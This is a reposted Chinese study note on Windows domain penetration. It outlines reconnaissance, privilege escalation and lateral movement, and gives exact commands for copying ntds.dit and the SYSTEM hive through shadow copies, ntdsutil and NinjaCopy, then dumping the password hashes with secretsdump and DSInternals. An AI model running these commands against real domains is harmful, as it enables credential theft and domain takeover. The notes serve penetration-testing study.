|
|
Windows域渗透学习笔记[color=rgba(0, 0, 0, 0.3)]imp0wd3r [url=]HACK之道[/url] [color=rgba(0, 0, 0, 0.3)]2022-02-13 09:00
[color=rgba(0, 0, 0, 0.5)]收录于话题
#域渗透[color=rgba(0, 0, 0, 0.3)]2个
#渗透测试[color=rgba(0, 0, 0, 0.3)]57个
#web安全[color=rgba(0, 0, 0, 0.3)]55个
InfoWindows域渗透初探,一边学习一边整理,后边还会慢慢补充,大家有意见或者建议的话欢迎提Issue  思路在域环境中,一般的渗透思路如下: 获取一台域主机上的一个低权限用户,比如通过Webshell 信息收集(贯穿始终) 权限提升(提升到高权限来尝试获取其他域用户的登录凭据) 横向渗透(利用已经获得的登录凭据对其他域内主机进行渗透,或将当前机器作为代理,对域内其他机器进行扫描) 重复上述步骤直至控制域控
信息收集基本信息:net config workstatsion,包括计算机名、用户名、工作站域、登录域 用户相关: 查看域内用户:net user /domain(/domain表示向域控发起查询) 查看用户在域内的权限:net user username /domain 查看域内用户组:net group /domain 查看指定组内的用户:net group groupname /domain 查看用户会话:query user 查看用户密码/hash:mimikatz,相关知识点
主机相关: nbtstat和nbtscan主要使用了NetBIOS Over TCP/IP,相关知识点 域内通信主要通过Windows文件共享来实现,相关知识点 其他工具例如msf中post/windows/gather/下的模块同样可以用来收集信息,各个模块的使用方法详见msf文档。 关注公众号:hack之道,后台回复关键词:666,获取最新渗透教程和工具。 权限提升meterpreter getsystem Administrator -> System 相关知识点
incognito.exe list_tokens -u at运行定时任务 msf exploit/windows/local misconfiguration 利用服务、文件或文件夹等不严格的权限限制,比如允许更改服务设置,允许向加载DLL的位置写入文件等等 检查权限的工具:AccessChk,来自Windows Sysinternals misconfiguration检查工具:BeRoot
横向渗透代理、端口转发 Remote Command Execution(在获取到远程机器登录凭据的情况下在远程机器上执行命令) 权限维持Ntds.dit
DSInternals Get-ADDBAccount Meterpreter smart_hashdump impacket secretsdump.py - $key = Get-BootKey -SystemHivePath 'C:\Extract\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\Extract\ntds.dit' -BootKey $key python secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL 由于该文件在被域使用,所以无法直接copy Volume Shadow Copy PowerSploit NinjaCopy Ntdsutil - vssadmin create shadow /for=C:
copy VolumeName\Windows\NTDS\ntds.dit C:\Extract\ntds.dit
copy VolumeName\Windows\System32\config\SYSTEM C:\Extract\SYSTEM
vssadmin delete shadows /shadow={ShadowID} Invoke-NinjaCopy -path C:\Windows\NTDS\ntds.dit -verbose -localdestination C:\Extract\ntds.dit - ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy MOUNT_POINT\Windows\NTDS\ntds.dit C:\Extract\ntds.dit
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit %SystemRoot%\NTDS\Ntds.dit:真正的数据文件 %SystemRoot%\System32\Ntds.dit:分发副本,当一台机器升级到域控时,将该文件拷贝到 %SystemRoot%\NTDS\Ntds.dit,域数据由后者记录 NT Directory Service . Directory Information Tree 数据库文件,存储着域数据 存储在两个位置 文件导出 哈希提取
常用工具Referencehttps://3gstudent.github.io/ http://www.fuzzysecurity.com/tutorials/25.html https://github.com/l3m0n/pentest_study https://www.offensive-security.com/metasploit-unleashed/post-module-reference/ https://support.microsoft.com/en-us/help/313565/how-to-use-the-at-command-to-schedule-tasks http://www.fuzzysecurity.com/tutorials/16.html https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ https://blog.stealthbits.com/extracting-password-hashes-from-the-ntds-dit-file/ https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/
作者:imp0wd3r 往期推荐 针对容器场景的多功能渗透工具(文末下载) 对某骗子网站的渗透测试 工具|Burpsuite被动扫描流量转发插件 干货|Cobalt Strike上线 -- 短信提醒 内网域渗透小工具(附下载地址) 
[color=rgba(0, 0, 0, 0.9)]HACK之道[color=rgba(0, 0, 0, 0.5)] HACK之道,专注于红队攻防、实战技巧、CTF比赛、安全开发、安全运维、安全架构等精华技术文章及渗透教程、安全工具的分享。
[color=rgba(0, 0, 0, 0.5)] 8篇原创内容
[color=rgba(0, 0, 0, 0.3)] 公众号
[color=rgba(0, 0, 0, 0.3)]喜欢此内容的人还喜欢
看了就会的 Node.js 常用三方工具包
[color=rgba(0, 0, 0, 0.3)]前端技术优选
不喜欢
[color=rgba(0, 0, 0, 0.9)]不看的原因
确定
Linux 中的 JQ 命令使用实例
[color=rgba(0, 0, 0, 0.3)]Linux就该这么学
不喜欢
[color=rgba(0, 0, 0, 0.9)]不看的原因
确定
用C语言写一个虚拟机项目
[color=rgba(0, 0, 0, 0.3)]STM32嵌入式开发
不喜欢
[color=rgba(0, 0, 0, 0.9)]不看的原因
确定
 微信扫一扫
关注该公众号
|
|
发表于 2022-2-14 19:43:09